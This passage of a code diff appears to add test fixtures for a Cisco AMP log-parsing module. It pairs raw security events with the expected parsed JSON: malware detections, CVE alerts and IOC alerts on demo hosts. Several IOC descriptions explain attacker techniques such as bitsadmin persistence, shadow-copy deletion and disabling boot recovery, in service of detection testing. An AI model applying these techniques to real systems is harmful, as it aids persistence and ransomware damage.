This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
new file mode 100644
index 000000000000..4a602ba1c2b6
--- /dev/null
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
@@ -0,0 +1,2356 @@ +[ + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 742000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "c877b67a5733c59d0d8ed8d519df0c91", + "file.hash.sha1": "128aa78059540cf0cdae2a3cea30cd80e00f2046", + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "c877b67a5733c59d0d8ed8d519df0c91", + "128aa78059540cf0cdae2a3cea30cd80e00f2046" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:15:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6533243623469744000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 1358, + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": 
"cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT657.tmp", + "file.path": "\\\\?\\C:\\BIT657.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2295, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 5008, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "SqGGuYXyy.exe", + "file.path": "\\\\?\\C:\\SqGGuYXyy.exe", + "fileset.name": "amp", + "host.hostname": 
"Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6204, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptExecuteFakeExtension.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 875739000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739875754000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 10424, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. 
However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.", + "cisco.amp.cloud_ioc.short_description": "W32.Bitsadmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 868146000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739868158500, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00", + "file.name": "bitsadmin.exe", + "file.path": "/C:/Windows/System32/bitsadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 12096, + "process.hash.sha256": 
"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "related.hash": [ + "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptLaunchedZippedJS.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 846943000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739846959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 14294, + 
"process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:56.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 48000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576726048000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:04:56.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "/C:/windows/system32/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16006, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:49.000Z", + "cisco.amp.cloud_ioc.description": "The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.", + "cisco.amp.cloud_ioc.short_description": "W32.BCDEditDisableRecovery.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 672000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576727672000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-14T10:04:49.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/windows/system32/cmd.exe", + 
"fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17775, + "process.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:03:40.000Z", + "cisco.amp.cloud_ioc.description": "A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.", + "cisco.amp.cloud_ioc.short_description": "W32.FakeExtensionExec.RET", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Cloud IOC", + "event.category": [ + "file", 